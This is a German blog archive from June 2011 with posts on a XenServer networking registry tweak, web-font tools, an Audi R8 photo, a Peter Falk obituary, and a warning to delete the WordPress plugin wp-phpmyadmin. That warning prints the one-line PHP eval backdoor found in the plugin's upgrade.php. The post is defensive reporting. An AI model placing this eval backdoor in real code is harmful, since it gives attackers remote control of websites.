Monthly Archive:: Juni 2011

Citrix XenServer Netzwerk langsam

Bei Windows Server 2003 VM’s (virtuelle Maschine) unter Citrix XenServer kann es passieren, dass die Netzwerkperformance unterirdisch schlecht ist. Die Performance Einbußen treten auf, wenn man etwas von der VM über das Netzwerk empfangen will. Die Performance in Richtung VM ist in den meisten Fällen in Ordnung.

Wenn man dieses Problem mit einer Windows Server 2003 VM hat, dann gibt es einen einfachen Registry Tweak um die Performance deutlich zu verbessern -> man muss den Task Offload deaktivieren.

Dazu öffnet man regedit und erstellt einen REG_DWORK Key mit dem Namen DisableTaskOffload und dem Wert 1 unter HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameter .

thingybob-registry-tweak-vm-performance

Nach einem reboot der VM das Problem behoben und die VM kann wieder in voller Bandbreite angesprochen werden.

VIA

Hilfreiche Tools zur Font Auswahl für dein Blog

Das Problem kennt jeder – 20 Tausend Fonts auf dem PC – aber welchen soll ich für mein Blog / Webseite nehmen?

thingybob-fonts-wordle
Das Wichtigste am Anfang – man sollte einen Font wählen der bei den meisten Benutzern dann auch angezeigt werden kann – dazu muss der genutzte Font beim Seitenbesucher auf dem PC, Mac oder Tablet vorhanden sein, ansonsten wird der Font einfach ersetzt.
Mit einigen Fonts ist man quasi immer auf der sicheren Seite da diese mit dem Betriebssystem mitkommen und somit auf den meisten Computern vorhanden sein sollten. Eine Übersicht über den Verbreitungsgrad der verschiedenen Fonts findet ihr bei Webmasterpro.de – einen dieser Fonts wird man auf vielen Webseiten auch antreffen.

Es gibt noch einige andere Möglichkeiten wie man seinen Wunschfont für die Webseite nutzen kann ohne dass der Font auch beim Seitenbesucher installiert ist, dazu zählen cufón oder Google Web Fonts. Ich selbst nutze hier auf der Seite Google Web Fonts um meine Wunschtypografie zu erhalten.

Ein Problem bleibt bestehen – die Auswahl an Fonts – hier den passenden zu finden ist gar nicht so einfach. Mit den folgenden Tools kann man sich die Arbeit ein wenig erleichtern:

1. Typetester.org

thingybob-typetester
Hier kann man verschiedene Fonts miteinander vergleichen. Dazu hat man eine Liste mit verbreiteten Fonts oder man wählt einen der auf dem PC installierten Fonts für den Vergleich aus. Größe, Farbe, Spacing – alle diese Werte lassen sich beeinflussen.

2. STC Fontbrowser

thingybob-stc-font-browser
Mit dem STC Fontbrowser kann man sich eine Übersicht über die lokal installieren Fonts verschaffen und mit einem VorschauText verschiedene Fonts probieren. Vergleichen der Fonts geht allerdings nicht.

3. Google Web Fonts Preview

thingybob-google-web-fonts-preview
Mit diesem Tool kann man sich zum einen einen Probetext mit den verschiedenen Google Fonts ansehen und das Aussehen (Größe, Schatten etc.) beeinflussen, zum anderen gibt es direkt dann einen Code den man zur Nutzung dieses Fonts auf seinen Webseiten einbinden kann -> sehr praktisch!

Für Chrome Browser gibt es dann noch ein richtig gutes Addon – mit diesem kann man auf jeder Webseite austesten wie verschiedene Google Fonts auf der Seite aussehen würden.
Mit dem Google Font Previewer für Chrome lässt sich somit auf deinem bestehen Blog OHNE Veränderungen am Blog selbst die verschiedenen Fonts ansehen und somit lässt sich am Besten entscheiden welcher Font zum Design passt.
So habe ich das auch auf thingybob.de gemacht und letzten Endes den Font gefunden welchen ich derzeit nutze. Ich hatte eine Liste von ca. 15 Fonts erstellt welche mir gut gefallen haben, diese habe ich dann ‘live’ mit dem Addon ausprobiert und bin am Ende bei ‘Muli’ gelandet, mir gefällts :)

Zum integrieren von Google Fonts in WordPress nutze ich ein Premium Plug-In – mit Font Uploader geht die Integration Kinderleicht von der Hand. Das Plug-In kann auch mit Fonts umgehen die nicht von Google kommen, man kann seine eigenen Fonts hochladen und im Blog einbinden, funktioniert sogar mit Internet Explorer :)

    • Alle .otf, .ttf und .eot Font Dateien werden unterstützt
    • 100% Browser kompatibel
    • Kontrolliere jeden Aspekt der Fonts auf deiner WordPress Installation
    • Größen Kontrolle für alle Elemente
    • Kompatibel mit WordPress 2.6+
    • Google WebFont Support
    • Leicht zu nutzen
    • Erweiterte Funktionen für Nutzer mit html / CSS Wissen

Na, wenn das nichts ist…. Das Plug-In kostet 10 USD für eine Installation, das sollte erschwinglich sein, besonders wenn man bedenkt wie viel Arbeit es ab nimmt.

So, nun viel Glück auf der Suche nach ‘deinem’ Font und viel Spaß beim Einbau in deine Webseite

Webmasterpro.de Fontübersicht | cufón | Google Web Fonts | Typetester.org | STC Fontbrowser | Font uploader

Audi bringt den R8 GT Spyder zum 24h Rennen

Nummer 0 von 333 – quasi der Prototyp. Audi hat den R8 GT Spyder mit zum 24h Rennen an den Nürburgring gebracht. Ich durfte ihn – leider nicht fahren – aber zumindest fotografieren, hier schon mal ein schneller Vorgeschmack – ich poste später noch weitere Bilder.

thingybob-r8gt-spyder

Schick muss ich sagen, der R8 GT Spyder gefällt mir sehr gut, leider immer noch nicht meine Preisklasse – aber die 333 Stück welche gebaut werden dürften auch für 208000.- EUR schnell vergriffen sein.

wp-phpmyadmin Plug-In – Jetzt löschen!

Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden.
Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation.

Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus geben, ist aber schon seit einigen Jahren nicht mehr upgedatet worden. Bitte prüfen ob ihr das Plug nutzt und wenn ja ggf. entfernen!

Sucuri

Columbo ist Tot – R.I.P Peter Falk

thingybob-peter-falkWer kennt ihn nicht, den schrulligen Trenchcoat tragenden Meister Detektiv Columbo. Gespielt von Peter Falk löste Columbo in 35 Jahren 69 Fälle – alle in seiner ihm eigenen Art, manche würden ihn nervig nennen.
Peter Falk ist nun im Alter von 83 Jahren in Kalifornien gestorben, er war schwer krank und hat unter Demenz gelitten. Laut seiner Familie ist er am 23.Juni friedlich in seinem Bett gestorben.